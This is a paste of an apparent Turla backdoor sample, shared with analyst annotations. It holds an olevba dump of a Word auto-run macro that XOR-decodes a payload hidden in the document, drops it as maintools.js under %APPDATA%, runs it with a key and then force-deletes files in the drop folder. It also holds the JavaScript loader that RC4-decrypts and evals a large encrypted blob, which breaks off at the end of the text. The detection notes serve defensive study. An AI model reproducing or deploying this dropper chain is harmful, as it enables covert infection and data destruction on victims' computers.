hollerith

turla backdoor

Oct 4th, 2017
  1. ## Uploaded by @JohnLaTwC
  2. ## Sample Hash: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  3.  
  4. ## ---- Macro (olevba dump of the VBA project in the sample)
  5. olevba 0.50 - http://decalage.info/python/oletools
  6. Flags        Filename                                                        
  7. -----------  -----------------------------------------------------------------
  8. OLE:MASI-B-- ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  9. ===============================================================================
  10. FILE: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  11. Type: OLE
  12. -------------------------------------------------------------------------------
  13. VBA MACRO ThisDocument.cls
  14. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/ThisDocument'
  15. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  16. (empty macro)
  17. -------------------------------------------------------------------------------
  18. VBA MACRO Module1.bas
  19. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/Module1'
  20. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Module-level state shared by AutoOpen and AutoClose: the first string receives the full path of
  ' the dropped script, the second the folder it was written to (both are assigned in AutoOpen).
  21. Public OBKHLrC3vEDjVL As String
  22. Public B8qen2T433Ds1bW As String
  ' Decodes a byte array in place with a rolling single-byte XOR key.
  ' First argument: the buffer to decode. Second argument: the number of bytes to process.
  ' The key starts at 45 and, after each byte, becomes (key Xor 99) Xor (i Mod 254).
  ' Always returns True, so the caller's failure branch is never taken because of this routine.
  ' Analyst note: the key schedule is fixed and depends on nothing outside the macro, so the
  ' embedded payload can be recovered statically by replaying it over the bytes after the marker.
  23. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
  24. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
  ' Initial key byte.
  25. THQNfU76nlSbtJ5nX8LY6 = 45
  26. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
  27. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
  ' Advance the key using the constant 99 and the current byte index.
  28. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
  29. Next i
  30. Q7JOhn5pIl648L6V43V = True
  31. End Function
  ' Word auto-macro that runs when the document is closed; it removes on-disk traces of the drop.
  ' Errors are suppressed throughout, so a missing file or folder does not surface to the user.
  ' Forensic note: the wildcard delete below removes every file in the drop folder, not only the
  ' dropped script, so unrelated files in that folder may disappear as a side effect.
  32. Sub AutoClose()
  33. On Error Resume Next
  ' Delete the dropped script (path stored by AutoOpen).
  34. Kill OBKHLrC3vEDjVL
  35. On Error Resume Next
  36. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  ' Force-delete (second argument True) all files matching *.* in the folder chosen by AutoOpen.
  37. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
  38. Set R7Ks7ug4hRR2weOy7 = Nothing
  39. End Sub
  ' Word auto-macro that runs when the document is opened. It is the dropper stage:
  '   1. reads the document file itself and looks for an 80-character marker string,
  '   2. reads 16828 bytes that follow the marker and XOR-decodes them,
  '   3. writes the result as maintools.js under %APPDATA% and runs it with a fixed argument.
  ' Any error, or a missing marker, jumps to the label at the end, which only saves the document.
  ' Detection notes: the Office process writing maintools.js into %APPDATA%\Microsoft\Windows
  ' (or %APPDATA%), followed by a script launch whose command line ends in EzZETcSXyKAdF_e5I2i1,
  ' are the host artefacts this routine produces.
  40. Sub AutoOpen()
  41. On Error GoTo MnOWqnnpKXfRO
  42. Dim NEnrKxf8l511
  43. Dim N18Eoi6OG6T2rNoVl41W As Long
  44. Dim M5wI32R3VF2g5B21EK4d As Long
  ' Load the whole document file from disk into a byte array.
  45. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
  46. NEnrKxf8l511 = FreeFile
  47. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
  48. Dim E2kvpmR17SI() As Byte
  49. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
  50. Get #NEnrKxf8l511, 1, E2kvpmR17SI
  ' Convert the bytes to a string so the regular-expression object can search them.
  51. Dim KqG31PcgwTc2oL47hjd7Oi As String
  52. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
  53. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
  54. Dim VUy5oj112fLw51h6S
  55. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
  ' 80-character marker that precedes the embedded payload inside the document file.
  ' The marker is a usable static signature for this sample.
  56. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
  57. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
  58. Dim Y5t4Ul7o385qK4YDhr
  ' No marker found: skip the drop entirely.
  59. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
  60. GoTo MnOWqnnpKXfRO
  61. End If
  ' Only the first match is used.
  62. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
  63. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
  64. Exit For
  65. Next
  66. Dim Wk4o3X7x1134j() As Byte
  67. Dim KDXl18qY4rcT As Long
  ' Upper bound of the payload buffer; indices 0..16827 give 16828 bytes.
  68. KDXl18qY4rcT = 16827
  69. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
  ' FirstIndex is zero-based and Get positions are one-based, so +81 lands just past the 80-character marker.
  70. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
  ' XOR-decode the payload in place (the decoder always returns True).
  71. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
  72. GoTo MnOWqnnpKXfRO
  73. End If
  ' Drop folder: %APPDATA%\Microsoft\Windows, falling back to %APPDATA% if that folder does not exist.
  74. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
  75. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  76. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
  77. B8qen2T433Ds1bW = Environ("appdata")
  78. End If
  79. Set R7Ks7ug4hRR2weOy7 = Nothing
  80. Dim K764B5Ph46Vh
  81. K764B5Ph46Vh = FreeFile
  ' Write the decoded bytes to <drop folder>\maintools.js.
  82. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
  83. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
  84. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
  85. Close #K764B5Ph46Vh
  86. Erase Wk4o3X7x1134j
  ' Launch the dropped script through WScript.Shell with the quoted path and one argument.
  ' maintools.js reads that argument as WScript.Arguments(0) and uses it as its decryption key.
  87. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
  88. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
  89. ActiveDocument.Save
  90. Exit Sub
  ' Error / no-marker path: close the output handle and save the document.
  91. MnOWqnnpKXfRO:
  92. Close #K764B5Ph46Vh
  93. ActiveDocument.Save
  94. End Sub
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104. Attribute VB_Name SHA1  
  105. 5BD2E2B8DDC65931704C8C3EA57ADC2BB778F66A
  106.  
  107. ## ---- maintools.js (the script the macro above writes to disk and runs)
  // Second-stage loader, run under Windows Script Host.
  // It takes the first command-line argument as a key, fetches the embedded base64 string from
  // y3zb(), base64-decodes it with LXv5(), decrypts the bytes with CpPT() (an RC4 implementation)
  // and passes the resulting text to eval(). Any exception ends the script silently.
  // Analyst note: the next stage exists only in memory here; the decrypted text is what the
  // "decoded eval" section of this page shows. The key is the argument supplied by the macro.
  108. try {
  109.     var wvy1 = WScript.Arguments;
  110.     var ssWZ = wvy1(0);
  111.     var ES3c = y3zb();
  112.     ES3c = LXv5(ES3c);
  113.     ES3c = CpPT(ssWZ, ES3c);
  114.     eval(ES3c);
  115. } catch (e) {
  116.     WScript.Quit();
  117. }
  118.  
  // Maps one base64 character to its 6-bit value.
  // Accepts both the standard alphabet ('+' and '/') and the URL-safe one ('-' and '_').
  // Returns -1 for other characters below '0'. Characters between '9' and 'A' (including '=')
  // fall into the upper-case branch and yield a negative number; characters above 'z' match no
  // branch and yield undefined.
  119. function MTvK(CgqD) {
  120.     var XwH7 = CgqD.charCodeAt(0);
  121.     if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
  122.     if (XwH7 === 0x2F || XwH7 === 0x5F) return 63
  123.     if (XwH7 < 0x30) return -1
  124.     if (XwH7 < 0x30 + 10) return XwH7 - 0x30 + 26 + 26
  125.     if (XwH7 < 0x41 + 26) return XwH7 - 0x41
  126.     if (XwH7 < 0x61 + 26) return XwH7 - 0x61 + 26
  127. }
  128.  
  // Base64 decoder: turns the string d27x into an array of byte values.
  // Returns undefined when the input length is not a multiple of 4.
  // The alphabet string LUK7 is declared but not used; character lookup goes through MTvK().
  129. function LXv5(d27x) {
  130.     var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  131.     var i;
  132.     var j;
  133.     var n6T8;
  134.     if (d27x.length % 4 > 0)
  135.         return;
  136.     var CHlB = d27x.length;
  // Number of '=' padding characters at the end (0, 1 or 2).
  137.     var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
  138.    var mjqo = new Array(d27x.length * 3 / 4 - V8eR);
  // Full 4-character groups end before the padded group, if there is one.
  139.     var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;
  140.     var t2JG = 0;
  141.  
  // Appends one byte to the output array.
  142.     function XGH6(b0tQ) {
  143.         mjqo[t2JG++] = b0tQ;
  144.     }
  // Each group of four characters yields three bytes.
  145.     for (i = 0, j = 0; i < z8Ht; i += 4, j += 3) {
  146.         n6T8 = (MTvK(d27x.charAt(i)) << 18) | (MTvK(d27x.charAt(i + 1)) << 12) | (MTvK(d27x.charAt(i + 2)) << 6) | MTvK(d27x.charAt(i + 3));
  147.         XGH6((n6T8 & 0xFF0000) >> 16)
  148.         XGH6((n6T8 & 0xFF00) >> 8)
  149.         XGH6(n6T8 & 0xFF)
  150.     }
  // Final padded group: two '=' leave one byte, one '=' leaves two bytes.
  151.     if (V8eR === 2) {
  152.         n6T8 = (MTvK(d27x.charAt(i)) << 2) | (MTvK(d27x.charAt(i + 1)) >> 4)
  153.         XGH6(n6T8 & 0xFF)
  154.     } else if (V8eR === 1) {
  155.         n6T8 = (MTvK(d27x.charAt(i)) << 10) | (MTvK(d27x.charAt(i + 1)) << 4) | (MTvK(d27x.charAt(i + 2)) >> 2)
  156.         XGH6((n6T8 >> 8) & 0xFF)
  157.         XGH6(n6T8 & 0xFF)
  158.     }
  159.     return mjqo
  160. }
  161.  
  // RC4 stream cipher: bOe3 is the key (a string), F5vZ the input as an array of byte values.
  // Returns the output as a string with one character per byte.
  // The same routine encrypts and decrypts; the loader uses it to decrypt the embedded payload
  // with the command-line argument as the key.
  162. function CpPT(bOe3, F5vZ) {
  163.     var AWy7 = [];
  164.     var V2Vl = 0;
  165.     var qyCq;
  166.     var mjqo = '';
  // Key scheduling: start from the identity permutation of 0..255 ...
  167.    for (var i = 0; i < 256; i++) {
  168.         AWy7[i] = i;
  169.     }
  // ... and shuffle it under control of the key characters.
  170.     for (var i = 0; i < 256; i++) {
  171.         V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;
  172.         qyCq = AWy7[i];
  173.         AWy7[i] = AWy7[V2Vl];
  174.         AWy7[V2Vl] = qyCq;
  175.     }
  176.     var i = 0;
  177.     var V2Vl = 0;
  // Keystream generation: one keystream byte is XORed with each input byte.
  178.     for (var y = 0; y < F5vZ.length; y++) {
  179.         i = (i + 1) % 256;
  180.         V2Vl = (V2Vl + AWy7[i]) % 256;
  181.         qyCq = AWy7[i];
  182.         AWy7[i] = AWy7[V2Vl];
  183.         AWy7[V2Vl] = qyCq;
  184.         mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);
  185.     }
  186.     return mjqo;
  187. }
  188.  
  189. function y3zb() {
  190.     var qGxZ = "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